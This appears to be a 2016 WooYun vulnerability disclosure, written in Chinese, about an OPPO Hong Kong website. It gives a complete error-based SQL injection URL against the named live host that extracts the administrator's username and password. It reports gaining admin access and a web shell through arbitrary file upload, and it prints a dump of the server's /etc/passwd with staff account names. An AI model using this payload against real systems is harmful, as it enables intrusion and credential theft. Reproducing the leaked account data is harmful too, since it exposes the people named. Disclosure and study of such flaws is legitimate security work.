2016-05-29: 细节已通知厂商并且等待厂商处理中 2016-05-29: 厂商已查看当前漏洞内容,细节仅向厂商公开 2016-06-08: 厂商已经主动忽略漏洞,细节向公众公开
oppo手机hk主站报错注入(已getshell)
1.http://**.**.**//club_register.phpact=check_username&username=aa
报错注入
http://www.oppodigital.com.hk//club_register.php?act=check_username&username=aa' AND (SELECT 4089 FROM(SELECT COUNT(*),CONCAT(0x7162767071,(select concat(0x23,0x23,username,0x23,0x23,password,0x23,0x23) from bd_admin where id=1 limit 1),0x7176716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'gyjt'='gyjt
注入得到数据登陆后台
存在任意文件上传 getshell
nginx:x:105:107:nginx user,,,:/nonexistent:/bin/falsemysql:x:106:108:MySQL Server,,,:/nonexistent:/bin/falsemessagebus:x:107:109::/var/run/dbus:/bin/false#xtjiao:x:1003:1003:,,,:/home/xtjiao:/bin/bash#zwzheng:x:1004:1004:,,,:/home/zwzheng:/bin/bashsyncer:x:1005:1005:,,,:/home/syncer:/bin/bashsphinxsearch:x:108:110:Sphinx fulltext search service,,,:/var/run/sphinxsearch:/bin/falseredis:x:109:111:redis server,,,:/var/lib/redis:/bin/falsehwang:x:1006:1006:,,,:/home/hwang:/bin/bashlchen:x:1007:1007:,,,:/home/lchen:/bin/bashhbai:x:1002:1009:,,,:/home/hbai:/bin/bashavahi:x:110:112:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/falsetomcat55:x:111:65534::/usr/share/tomcat5.5:/bin/falsemjzhou:x:1000:1008:,,,:/home/mjzhou:/bin/bashqxu:x:1003:1010:,,,:/home/qxu:/bin/bashwjzhu:x:1004:1011:,,,:/home/wjzhu:/bin/bashcywang:x:1008:1012:,,,:/home/cywang:/bin/bashzjli:x:1009:1013::/home/zjli:/bin/shyfhu:x:1010:1014::/home/yfhu:/bin/shljni:x:1011:1015::/home/ljni:/bin/sh
已经证明
危害等级:无影响厂商忽略
忽略时间:2016-06-08 10:10
漏洞Rank:15 (WooYun评价)
暂无